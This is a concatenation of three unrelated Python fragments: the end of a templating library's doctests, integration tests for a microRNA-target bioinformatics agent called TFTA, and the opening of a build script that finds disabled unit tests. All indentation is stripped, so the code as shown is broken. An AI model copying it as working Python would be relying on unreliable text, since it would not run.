>>> t("$for i in range(5):$loop.index, $loop.parity")()
u'1, odd\n2, even\n3, odd\n4, even\n5, odd\n'
>>> t("$for i in range(2):\n $for j in range(2):$loop.parent.parity $loop.parity")()
u'odd odd\nodd even\neven odd\neven even\n'
Test assignment.
>>> t('$ a = 1\n$a')()
u'1\n'
>>> t('$ a = [1]\n$a[0]')()
u'1\n'
>>> t('$ a = {1: 1}\n$a.keys()[0]')()
u'1\n'
>>> t('$ a = []\n$if not a: 1')()
u'1\n'
>>> t('$ a = {}\n$if not a: 1')()
u'1\n'
>>> t('$ a = -1\n$a')()
u'-1\n'
>>> t('$ a = "1"\n$a')()
u'1\n'
Test comments.
>>> t('$# 0')()
u'\n'
>>> t('hello$#comment1\nhello$#comment2')()
u'hello\nhello\n'
>>> t('$#comment0\nhello$#comment1\nhello$#comment2')()
u'\nhello\nhello\n'
Test unicode.
>>> t('$def with (a)\n$a')(u'\u203d')
u'\u203d\n'
>>> t('$def with (a)\n$a')(u'\u203d'.encode('utf-8'))
u'\u203d\n'
>>> t(u'$def with (a)\n$a $:a')(u'\u203d')
u'\u203d \u203d\n'
>>> t(u'$def with ()\nfoo')()
u'foo\n'
>>> def f(x): return x
...
>>> t(u'$def with (f)\n$:f("x")')(f)
u'x\n'
>>> t('$def with (f)\n$:f("x")')(f)
u'x\n'
Test dollar escaping.
>>> t("Stop, $$money isn't evaluated.")()
u"Stop, $money isn't evaluated.\n"
>>> t("Stop, \$money isn't evaluated.")()
u"Stop, $money isn't evaluated.\n"
Test space sensitivity.
>>> t('$def with (x)\n$x')(1)
u'1\n'
>>> t('$def with(x ,y)\n$x')(1, 1)
u'1\n'
>>> t('$(1 + 2*3 + 4)')()
u'11\n'
Make sure globals are working.
>>> t('$x')()
Traceback (most recent call last):
...
NameError: global name 'x' is not defined
>>> t('$x', globals={'x': 1})()
u'1\n'
Can't change globals.
>>> t('$ x = 2\n$x', globals={'x': 1})()
u'2\n'
>>> t('$ x = x + 1\n$x', globals={'x': 1})()
Traceback (most recent call last):
...
UnboundLocalError: local variable 'x' referenced before assignment
Make sure builtins are customizable.
>>> t('$min(1, 2)')()
u'1\n'
>>> t('$min(1, 2)', builtins={})()
Traceback (most recent call last):
...
NameError: global name 'min' is not defined
Test vars.
>>> x = t('$var x: 1')()
>>> x.x
u'1'
>>> x = t('$var x = 1')()
>>> x.x
1
>>> x = t('$var x: \n foo\n bar')()
>>> x.x
u'foo\nbar\n'
Test BOM chars.
>>> t('\xef\xbb\xbf$def with(x)\n$x')('foo')
u'foo\n'
Test for with weird cases.
>>> t('$for i in range(10)[1:5]:\n $i')()
u'1\n2\n3\n4\n'
>>> t("$for k, v in {'a': 1, 'b': 2}.items():\n $k $v")()
u'a 1\nb 2\n'
>>> t("$for k, v in ({'a': 1, 'b': 2}.items():\n $k $v")()
Traceback (most recent call last):
...
SyntaxError: invalid syntax
Test datetime.
>>> import datetime
>>> t("$def with (date)\n$date.strftime('%m %Y')")(datetime.datetime(2009, 1, 1))
u'01 2009\n'
"""
pass
if __name__ == "__main__":
import sys
if '--compile' in sys.argv:
compile_templates(sys.argv[2])
else:
import doctest
doctest.testmod()
| |
from kqml import KQMLList, KQMLString
from tfta.tfta import TFTA
from tfta.tfta_module import TFTA_Module
from bioagents.tests.util import ekb_from_text, ekb_kstring_from_text, \
get_request, agent_clj_from_text
from bioagents.tests.integration import _IntegrationTest, _FailureTest
from indra.sources.trips.processor import TripsProcessor
from indra.statements import Agent
from bioagents import Bioagent
from indra.sources import trips
import re
#####################################
# Testing the following TFTA capabilities
# IS-MIRNA-TARGET
# FIND-TARGET-MIRNA
# FIND-MIRNA-TARGET
# FIND-GENE-COUNT-MIRNA
# FIND-MIRNA-COUNT-GENE
# FIND-TF-MIRNA
# FIND-EVIDENCE-MIRNA-TARGET
#
######################################
def _get_targets(target_arg):
proteins = None
family = None
agents = Bioagent.get_agent(target_arg)
if isinstance(agents, list):
proteins = [a.name for a in agents if a is not None and ('UP' in a.db_refs or 'HGNC' in a.db_refs)]
family = [a.name for a in agents if a is not None and 'FPLX' in a.db_refs and a.name not in proteins]
elif isinstance(agents, Agent):
if 'UP' in agents.db_refs or 'HGNC' in agents.db_refs:
proteins = [agents.name]
if not proteins and 'FPLX' in agents.db_refs:
family = [agents.name]
if proteins:
print('genes=', ','.join(proteins))
else:
print('Genes = None\n')
if family:
print('family=', ','.join(family))
else:
print('family = None\n')
return proteins,family
def agents_clj_from_text(text):
ekb_xml = ekb_from_text(text)
tp = trips.process_xml(ekb_xml)
agents = tp.get_agents()
clj = Bioagent.make_cljson(agents)
return clj
def get_mirnas(mir_arg):
mirna = []
try:
agents = Bioagent.get_agent(mir_arg)
except Exception:
return []
if isinstance(agents, list):
mirna = [_get_mirna_name(a.name) for a in agents if a is not None]
elif isinstance(agents, Agent):
mirna = [_get_mirna_name(agents.name)]
if mirna:
print('mirna=', ','.join(mirna))
else:
print('mirna = None')
return mirna
def _get_mirna_name(str1):
#handle two forms of input, like MIR-PUNC-MINUS-20-B-PUNC-MINUS-5-P and MIR-20-B-5-P
if 'PUNC-MINUS' in str1:
str2 = str1.replace('-PUNC-MINUS-','_')
str2 = str2.replace('-','')
str2 = str2.replace('_', '-')
return str2.upper()
else:
plist = re.findall('([0-9]+-[a-zA-Z])', str1)
s = str1
for p in plist:
p1 = p.replace('-','')
s = s.replace(p, p1)
return s.upper()
#In order to byparse trips due to the wrong interpretation of some microRNA names
def make_mirna_cljson(mir_str):
mir_str = mir_str.replace(' ', '')
mir_list = mir_str.split(',')
mir_agent = [Agent(mir) for mir in mir_list]
mir_json = Bioagent.make_cljson(mir_agent)
return mir_json
#############################################################################
# IS-MIRNA-TARGET
#Does miR-20b-5p target STAT3? (subtask: is-mirna-target)
class TestIsMirnaTarget1(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
mirna = agent_clj_from_text('miR-20b-5p')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
assert output.get('is-miRNA-target') == 'TRUE', output
#protein family
#Does miR-20b-5p target MEK? (subtask: is-mirna-target)
class TestIsMirnaTarget2(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('MEK')
mirna = agent_clj_from_text('miR-20b-5p')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
assert len(output.get('clarification')) == 5, output
#clarification test
#Does miR-200c target STAT3? (subtask: is-mirna-target)
class TestIsMirnaTarget3(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
mirna = agent_clj_from_text('miR-200c')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
####################################################################################
#FIND-TARGET-MIRNA
#What genes does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 917, output
#What genes are regulated by miR-297? (subtask: find-target-mirna)
class TestFindTargetMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-297')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 190, output
#What genes are regulated by miR-20b-5p and MIR-29B-1-5P? (subtask: find-target-mirna)
class TestFindTargetMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-20b-5p, MIR-29B-1-5P')
print("mirna=", mirna)
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 12, output
#What are the genes that have strong evidence of being regulated by mir-122-5p.? (subtask: find-target-mirna)
class TestFindTargetMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-122-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'strong')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 69, output
#What are the genes that have weak evidence of being regulated by mir-122-5p.? (subtask: find-target-mirna)
class TestFindTargetMirna5(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna5, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-122-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 556, output
#clarification test
#What are the genes that have weak evidence of being regulated by mir-128? (subtask: find-target-mirna)
class TestFindTargetMirna6(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna6, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-128')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("output.get('reason') = ", output.get('reason'))
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 3, output
#What genes are regulated by miR-200C? (subtask: find-target-mirna)
class TestFindTargetMirna7(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna7, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200C')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("output.get('reason') = ", output.get('targets'))
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
#Which of those genes does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna8(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna8, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-20b-5p')
of_those = agents_clj_from_text("STAT3, SRF, HRAS, KRAS, ELK1, JAK1, JAK2, FOS")
_get_targets(of_those)
print('target=', str(of_those))
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
assert len(output.get('targets')) == 2, output
#What are the genes that have weak evidence of being regulated by mir-122-5p.? (subtask: find-target-mirna)
class TestFindTargetMirna9(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna9, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('mir-122-5p')
of_those = agents_clj_from_text("STAT3, SRF, CDK4, CDK19, CSRP1, DZIP1L, HSPA4L")
_get_targets(of_those)
print('target=', str(of_those))
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 5, output
#test target-type
#What kinases does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna10(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna10, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
target_type = 'kinase'
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('target-type', target_type)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 40, output
#What transcription facotrs does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna11(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna11, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
target_type = 'transcription factor'
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('target-type', target_type)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 130, output
######################################################################################
#FIND-MIRNA-TARGET
#What microRNAs target STAT3? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 80, output
#What microRNAs target il2? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('il2')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 5, output
##What microRNAs target MEK? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('MEK')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
assert len(output.get('clarification')) == 5, output
#test of-those
#Which of those mirnas target il2?
class TestFindMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('il2')
of_those = agents_clj_from_text('miR-20b-5p, miR-125b-5p, miR-337-3p, miR-155-5p, miR-877-3p, miR-181c-5p, miR-503-3p')
get_mirnas(of_those)
print(of_those)
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 2, output
#Which of those mirnas also target stat3? (use output from what micrornas target il2?)
class TestFindMirna5(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna5, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('stat3')
of_those = agents_clj_from_text('miR-181c-5p, miR-484, MIR-155-5p, let-7i-5p, miR-503-3p')
get_mirnas(of_those)
print(of_those)
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 1, output
#####################################################################################
#FIND-GENE-COUNT-MIRNA
##What genes are most frequently regulated by miR-335-5p, miR-155-5p, miR-145-5p, and miR-20a-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p, miR-20a-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#What genes are most frequently regulated by miR-335-5p, miR-155-5p and miR-145-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#clarification
#What genes are most frequently regulated by miR-128, miR-200c, and miR-20a-5p?
class TestFindGeneCountMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-122, miR-200c, and miR-20a-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
print("len(output.get('clarification').get('as'))=",len(output.get('clarification').get('as')))
assert len(output.get('clarification').get('as')) == 2, output
#subsequent query
#Which of those genes are most frequently regulated by miR-335-5p, miR-155-5p, miR-145-5p, and miR-20a-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p, miR-20a-5p')
of_those = agents_clj_from_text('stat3,srf,hras,CDK19, HSPA4L,FOXRED2,ZBTB25,cd28,sp4,TNKS2')
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#######################################################################################
##FIND-MIRNA-COUNT-GENE
#What miRNAs most frequently regulate EGFR, SRF, STAT3, JAK2, and SMAD3?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene1(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, SRF, STAT3, JAK2, SMAD3')
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 23, output
#which of those miRNAs most frequently regulate EGFR, SRF, STAT3, JAK2, and SMAD3?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene2(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, SRF, STAT3, JAK2, SMAD3')
of_those = make_mirna_cljson('miR-200a-3p,miR-125b-5p, miR-29b-1-5p, miR-16-5p, miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(of_those)
print('of_those=', of_those)
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 7, output
#which of those miRNAs most frequently regulate EGFR, and AKT?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene3(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, AKT')
of_those = make_mirna_cljson('miR-200a-3p,miR-125b-5p, miR-29b-1-5p, miR-16-5p, miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(of_those)
print('of_those=', of_those)
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
print("len(output.get('clarification').get('as'))=", len(output.get('clarification').get('as')))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 3, output
####################################################################################
# FIND-TF-MIRNA
##what transcription factors does miR-124-3p regulate?
class TestFindTfMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-124-3p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 156, output
##what transcription factors does miR-200c regulate?
class TestFindTfMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
print("len(output.get('clarification'))=", str(len(output.get('clarification'))))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 2, output
##what transcription factors does miR-200c-3p regulate?
class TestFindTfMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c-3p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 39, output
#subsequent query
##which of these transcription factors does miR-200c-3p regulate?
class TestFindTfMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c-3p')
get_mirnas(mirna)
print('mirna=', mirna)
of_those = agents_clj_from_text('ATRX, DNMT3B, MBD5,stat3,ZMAT3')
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 3, output
###################################################################################
# FIND-EVIDENCE-MIRNA-TARGET
#show me evidence that miR-148a-3p targets DNMT1?
class TestFindEvidenceMirnaTarget1(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a-3p')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('evidence'))=", len(output.get('evidence')))
assert len(output.get('evidence')) == 7, output
#clarification
#show me evidence that miR-148a targets DNMT1?
class TestFindEvidenceMirnaTarget2(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
#show me evidence that miR-148 targets DNMT1?
class TestFindEvidenceMirnaTarget3(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'NO_SIMILAR_MIRNA', output
#test family name
#show me evidence that miR-148a-3p targets STAT?
class TestFindEvidenceMirnaTarget4(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a-3p')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('STAT')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
print("len(output.get('clarification').get('as'))=", len(output.get('clarification').get('as')))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 8, output
| |
#!/usr/bin/env python
#
# $Id: check_disabled_tests.py 9317 2011-06-10 02:09:04Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import os
import sys
buildscriptDir = os.path.dirname(__file__)
buildscriptDir = os.path.abspath(os.path.join(buildscriptDir, os.path.pardir))
sys.path.append(buildscriptDir)
import re
import sandbox
import optparse
import smtplib
import svnwrap
import codescan
import xmail
import metadata
from ioutil import *
from disabled_unit_test import DisabledUnitTest
EXT_PAT = re.compile(r'.*\.(cpp|java|h|py)$', re.IGNORECASE)
_LBL_PAT = re.compile(r'^\s*([a-z]+):\s*(.*?)\s*$', re.IGNORECASE)
_DISABLED_DESCRIPTOR_MARKER = 'UNIT TEST TEMPORARILY DISABLED'
DISABLED_PAT = re.compile('/\\*[-_\\.\\* \t\r\n]*%s.*?\\*/' % _DISABLED_DESCRIPTOR_MARKER, re.DOTALL)
